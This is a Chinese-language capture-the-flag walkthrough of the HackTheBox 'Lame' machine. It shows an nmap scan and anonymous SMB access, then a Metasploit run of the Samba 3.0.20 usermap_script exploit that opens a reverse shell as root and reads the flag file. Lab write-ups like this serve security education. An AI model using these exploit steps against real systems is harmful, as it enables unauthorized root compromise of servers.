实战HackTheBo里的LAME

这是一台非常简单的机器，几乎不值得完成其编写工作。但是我最终决定纯粹是为了完整性。

我用NMAP扫描了机器，并看到以下详细信息。

# Nmap 7.70 scan initiated Thu Aug 22 10:10:07 2019 as: nmap -A -p- -oN scan 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.065s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2d23h03m38s, deviation: 0s, median: -2d23h03m38s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-19T02:31:04-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   30.07 ms 10.10.14.1
2   31.77 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 22 10:35:22 2019 -- 1 IP address (1 host up) scanned in 1516.09 seconds

从这里我们可以看到FTP，SMB，DISTCC和SSH都在运行。FTP允许匿名访问。但是没有文件。接下来，我尝试连接到SMB：

root@kali://root/websvr# smbclient \\\\10.10.10.3\\tmp -p 445 
Enter WORKGROUP\root's password:                                          
Anonymous login successful                                                
Try "help" to get a list of possible commands.                            
smb: \> ls                                                                
  .                                   D        0  Fri Dec  6 16:56:00 2019
  ..                                 DR        0  Sun May 20 20:36:12 2012
  orbit-makis                        DR        0  Fri Dec  6 11:25:31 2019
  .ICE-unix                          DH        0  Fri Dec  6 11:03:09 2019
  .X11-unix                          DH        0  Fri Dec  6 11:03:34 2019
  gconfd-makis                       DR        0  Fri Dec  6 11:25:31 2019
  .X0-lock                           HR       11  Fri Dec  6 11:03:34 2019                        
  5120.jsvc_up                        R        0  Fri Dec  6 11:04:17 2019        
                                                                                                                    
                7282168 blocks of size 1024. 5678284 blocks available

你会从输出中看到，我们还具有匿名SMB访问权限。但是，经过一些浏览后，SMB内也没有存储有用的文件。

在NMAP扫描中检测到的详细信息之一是正在使用Samba 3.0.20-Debian。我在Google上搜索了涉及此版本SAMBA的漏洞。我发现了一个Username Map Script漏洞利用程序，它可以通过指定包含shell元字符的用户名来执行命令。此漏洞包含在metasploit中。因此，我启动了msfconsole并运行了漏洞利用程序：

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3                                           
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit 
[*] Started reverse TCP double handler on 10.10.14.25:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RXu673TIo0yJNYIz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RXu673TIo0yJNYIz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.3:59078) at 2019-12-09 20:05:13 +0000                                                                                       
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
whoami
root
cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
[REDACTED]

从输出中，你可以看到漏洞利用程序已成功运行。输入whoami命令显示我以root用户身份运行。从这里，我能够浏览到/ root和cat root.txt。

关注：Hunter网络安全 获取更多资讯
网站：bbs.kylzrv.com
CTF团队：Hunter网络安全
文章：Xtrato
排版：Hunter-匿名者